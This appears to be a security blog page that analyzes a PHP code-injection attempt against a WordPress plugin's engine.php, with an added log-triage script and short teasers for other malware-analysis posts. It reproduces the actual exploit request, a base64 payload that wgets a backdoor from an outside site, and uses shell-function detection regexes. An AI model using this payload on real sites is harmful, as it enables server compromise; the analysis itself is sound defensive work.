Automated or manual attack?
Today I received a notification about an automated attack against this blog. Nothing new; however, I was curious about how exactly it works and decided to take a brief look at the attack to answer a few questions:
- What vulnerability is this exploiting? Am I vulnerable?
- What does the payload do?
- Is this an automated attack or a manually launched one?
The attack in the logs
Since I installed the Mute Screamer plugin for WordPress I regularly receive attack alerts (mainly about spamming). The one I received today was a bit different. In the generated log file the following line appears:
/blog/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgaHR0cDovL3d3dy5zY2sub2JlY3ZyYm92LnNrL3dwLWNvbnRlbnQvdXBsb2Fkcy9mZ2FsbGVyeS9zaC50eHQ7IG12IHNoLnR4dCBsb2cucGhwJyk7));
So, this is an exploit for a PHP code injection vulnerability in "engine.php": the value of the "type" parameter ends up being evaluated as PHP, so the attacker closes the expected ih_options() call and chains an eval(base64_decode(...)) after it. A quick search for the vulnerability turned up this: WordPress is_human() Plugin Remote Command Injection Vulnerability. Fortunately, I don't have this plugin installed, so the first two questions are already answered. Time to answer the next one: what does the payload do?
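To answer that question the quick way, here is a small log triage script. It is an added example, not part of the original post or of any tool mentioned on this page: it picks the requests that match the engine.php injection pattern out of Apache-style access log lines, extracts the base64 inside eval(base64_decode(...)), decodes it and pulls the shell command out of the PHP command-execution call. The first sample line embeds the exact request from the log above; the other two lines (a harmless request and a URL-encoded variant of the same exploit), the client addresses, timestamps and the helper names are constructed for the example.

```python
import base64
import re
from urllib.parse import unquote, urlsplit

# Constructed sample access log. Line 1 carries the request quoted in the post,
# lines 2 and 3 are made up: normal traffic and a percent-encoded variant.
SAMPLE_LOG = """\
192.0.2.10 - - [01/Jul/2010:12:00:00 +0200] "GET /blog/engine.php?action=log-reset&type=ih_options();eval(base64_decode(cGFzc3RocnUoJ3dnZXQgaHR0cDovL3d3dy5zY2sub2JlY3ZyYm92LnNrL3dwLWNvbnRlbnQvdXBsb2Fkcy9mZ2FsbGVyeS9zaC50eHQ7IG12IHNoLnR4dCBsb2cucGhwJyk7)); HTTP/1.1" 404 512 "-" "Mozilla/4.0"
192.0.2.10 - - [01/Jul/2010:12:00:01 +0200] "GET /blog/?p=42 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
198.51.100.7 - - [01/Jul/2010:12:05:00 +0200] "GET /blog/engine.php?action=log-reset&type=ih_options%28%29%3Beval%28base64_decode%28cGFzc3RocnUoJ2lkJyk7%29%29%3B HTTP/1.1" 404 512 "-" "-"
"""

REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
# eval(base64_decode(<b64>)) with or without quotes around the constant
EVAL_B64_RE = re.compile(
    r"eval\(\s*base64_decode\(\s*['\"]?([A-Za-z0-9+/=]+)['\"]?\s*\)\s*\)", re.I)
# PHP functions that run a shell command given as a quoted string
SHELL_FN_RE = re.compile(
    r"\b(passthru|system|exec|shell_exec|popen|proc_open)\s*\(\s*['\"](.*?)['\"]\s*\)",
    re.S)


def parse_request(line):
    """Return the request target of a combined-format log line, or None."""
    m = REQUEST_RE.search(line)
    return m.group(1) if m else None


def query_params(query):
    """Split a query string on '&' only (parse_qs also splits on ';' on older
    Pythons, which would cut the injected PHP in half) and percent-decode."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        params[unquote(key)] = unquote(value)
    return params


def is_human_injection(path):
    """The plugin's 'type' parameter is meant to be a plain option name, so
    parentheses or semicolons in it mean PHP code is being injected."""
    parts = urlsplit(path)
    if not parts.path.endswith("/engine.php"):
        return False
    type_value = query_params(parts.query).get("type", "")
    return any(c in type_value for c in "();")


def decode_payload(path):
    """Return the PHP that eval() would execute, or None if there is none."""
    m = EVAL_B64_RE.search(unquote(path))
    if not m:
        return None
    b64 = m.group(1)
    b64 += "=" * (-len(b64) % 4)  # tolerate stripped padding
    try:
        return base64.b64decode(b64).decode("utf-8", "replace")
    except ValueError:
        return None


def shell_commands(php):
    """Extract the string argument of every command-execution call."""
    return [cmd for _, cmd in SHELL_FN_RE.findall(php)]


def analyze_log(text):
    """One finding per exploit attempt: raw request, decoded PHP, commands,
    and the URLs those commands would fetch (the dropper location)."""
    findings = []
    for line in text.splitlines():
        path = parse_request(line)
        if not path or not is_human_injection(path):
            continue
        php = decode_payload(path)
        commands = shell_commands(php) if php else []
        findings.append({
            "request": path,
            "php": php,
            "commands": commands,
            "fetched_urls": re.findall(r"https?://\S+", " ".join(commands)),
        })
    return findings


if __name__ == "__main__":
    for f in analyze_log(SAMPLE_LOG):
        print("request :", f["request"])
        print("php     :", f["php"])
        print("commands:", f["commands"])
        print("fetches :", f["fetched_urls"])
        print()
```

Run against the log line from the post, the script shows that the base64 hides a passthru() that wgets a text file from a compromised third-party WordPress site and renames it to log.php, i.e. the stage that drops a PHP backdoor next to the vulnerable script. The wget URL is the indicator to block and to search for in other logs.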
Zerowine 2.0 preview
Hi!
I plan to release the newest version of ZeroWine, focused on automation, in a month or so. This new version consists of the following components:
- A modified version of Wine 1.10.
- One XMLRPC Server.
- One XMLRPC client tool.
Dangers of Oracle Virtual Columns
Virtual Columns are a new feature of Oracle 11g. This feature allows creating table columns whose values are computed by PL/SQL functions. While it's useful, it can be dangerous too.
MyNav, a python plugin for IDA Pro
MyNav is an Open Source IDAPython plugin for the commercial disassembler IDA Pro, to be released in July 2010. The plugin adds a lot of new features otherwise only available in other products, like the well known Zynamics BinNavi or HB Gary's Inspector. In this blog post I will show you some of the features available in the current version with some examples.
A typical work day with DeepToad
Sometimes I receive so many malware samples that it becomes impossible (or at least inhuman) to analyze all of them by hand, and I need to automate the typical (boring) tasks: clustering the samples into smaller sets and performing an initial (and superficial) analysis of the different samples. For the first task I created DeepToad, a tool to cluster any kind of file using fuzzy hashing techniques.